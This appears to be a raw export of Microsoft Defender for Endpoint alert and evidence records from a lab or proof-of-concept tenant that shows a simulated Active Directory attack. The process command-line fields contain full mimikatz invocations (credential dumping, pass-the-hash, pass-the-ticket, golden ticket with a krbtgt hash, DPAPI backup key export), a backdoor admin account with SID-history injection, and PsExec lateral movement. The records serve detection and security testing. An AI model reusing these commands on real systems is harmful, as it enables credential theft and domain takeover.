"2022-11-21T02:11:51.46Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:07:15.6313121Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 3020, "processCommandLine": "net.exe user /add BDAdmin Password1! ", "processCreationTime": "2022-11-21T02:07:15.6863696Z", "processId": 5996, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:07.05Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:34:15.0073785Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 6984, "processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"", "processCreationTime": "2022-11-21T02:34:15.4789089Z", "processId": 4960, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9", "sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:07.05Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:34:15.4789089Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 4960, "processCommandLine": "net.exe user /add BDAdmin Password1! ", "processCreationTime": "2022-11-21T02:34:15.5232143Z", "processId": 6372, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072963026499465_1469012925
8c0c6243-34ce-45ce-a756-bfdc837ffa12
975
MicrosoftDefenderForEndpoint
2022-12-22T08:58:22.6499651Z
2022-12-22T09:30:09.02Z
null
2022-12-22T08:47:29.6780551Z
2022-12-22T09:28:41.7266951Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
New
Medium
62
PendingApproval
null
null
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
null
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "prod.env", "firstSeen": "2022-12-08T01:04:21.9057174Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08" } } ]
[ { "aadUserId": null, "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-0-0", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": "The system cannot find the file specified.,The system cannot find the file specified.", "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:38:52.5569028Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 748, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-12-22T08:47:50.8661147Z", "processId": 4216, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:58:22.77Z", "fileName": "ntoskrnl.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-12-22T08:38:47.8970101Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f83368154fce0f4e8f9d6fe000ef522fbb3884b7", "sha256": "7e4a848626c99c715bd2c8686061420b8895e12ab8dfa0cce091f9df25750c13", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:08.7566667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:54:09.1992899Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 716, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-12-22T09:28:41.326336Z", "processId": 6356, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T09:30:09.01Z", "fileName": "ntoskrnl.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-12-22T08:54:03.8865956Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "e502daf3827521dcc443e1f60c50adcee3278e2d", "sha256": "bc4b64553cd9b81e2fd5e382fd4024d4eacc04417682c02b468900ea79883238", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:54:24.2666667Z
Suspicious
None
alice
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:48:46.97Z
Suspicious
None
admin
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037516155487687_800714493
f7f8d478-bb57-4a51-9786-b821fa89cfdb
686
MicrosoftDefenderForEndpoint
2022-11-11T08:20:15.5487939Z
2022-11-12T01:35:42.87Z
2022-11-11T09:47:40.27713Z
2022-11-11T08:17:05.7269006Z
2022-11-11T08:17:36.1641613Z
Multiple dual-purpose tools were dropped
Multiple known public tools, which could also be used for malicious reasons were dropped on this device. Attackers might download or copy multiple dual-purpose tools to the target device to perform various attack stages including, credential theft, privilege escalation, and lateral movement.
LateralMovement
Resolved
High
39
SuccessfullyRemediated
TruePositive
SecurityTesting
WindowsDefenderAtp
e0e0ea40-b5ca-4cbf-8380-24119951f847
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1021", "T1105", "T1555", "T1558.003", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "internal.corp", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "Rubeus.exe", "filePath": "C:\\M365DAttack\\Rubeus", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Remediated", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": "The system cannot find the file specified.", "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "PsExec.exe", "filePath": "C:\\M365DAttack\\PsTools", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "Get-KRBTicket.ps1", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "61a4a69fc19221b9abcb65a3be09ed3c041d1c42", "sha256": "3a4ae2a05b8f4cefcad48134573194239d2c1583d5f4d92d295aca7d4120a402", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "Step3-PasstheHash.txt", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "cccd2164b95b9fabbb90dd0faedd3299108a17e0", "sha256": "ed8cc55837d3b6893aeca35f90683571fcf4a650abcf361afb713545606d8284", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-11-11T08:17:06.3382251Z", "processId": 6044, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit", "processCreationTime": "2022-11-11T08:17:06.6760783Z", "processId": 816, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-11T08:17:12.3967497Z", "processId": 6556, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit", "processCreationTime": "2022-11-11T08:17:35.8323763Z", "processId": 5620, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-11T08:17:36.0206318Z", "processId": 5344, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:15.74Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads\\internal'", "processCreationTime": "2022-11-11T08:16:44.2952776Z", "processId": 4704, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:19:04.5366667Z
Suspicious
None
jeff
staging.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:04:34.8433333Z
Suspicious
Active
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
7,692
copy con test.txt
2022-11-21T02:02:06.2012631Z
620
2022-11-16T03:32:19.0279725Z
services.exe
C:\Windows\System32
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:11:51.33Z
Suspicious
None
steve
prod.env
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:08:06.97Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
6,948
"mimikatz.exe" privilege::debug "kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt:334c5cf2bab300e3e456e328f5c699d3 /user:Steve /ticket:C:\M365DAttack\Admin-Tickets\ticket.kirbi /ptt" exit
2022-11-21T02:06:53.9715954Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:46:17.65Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:44.8266667Z
Suspicious
Active
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
11,616
ipconfig
2022-11-21T02:01:44.3957302Z
null
null
null
null
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:14:46.34Z
Suspicious
None
jeff
prod.env
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
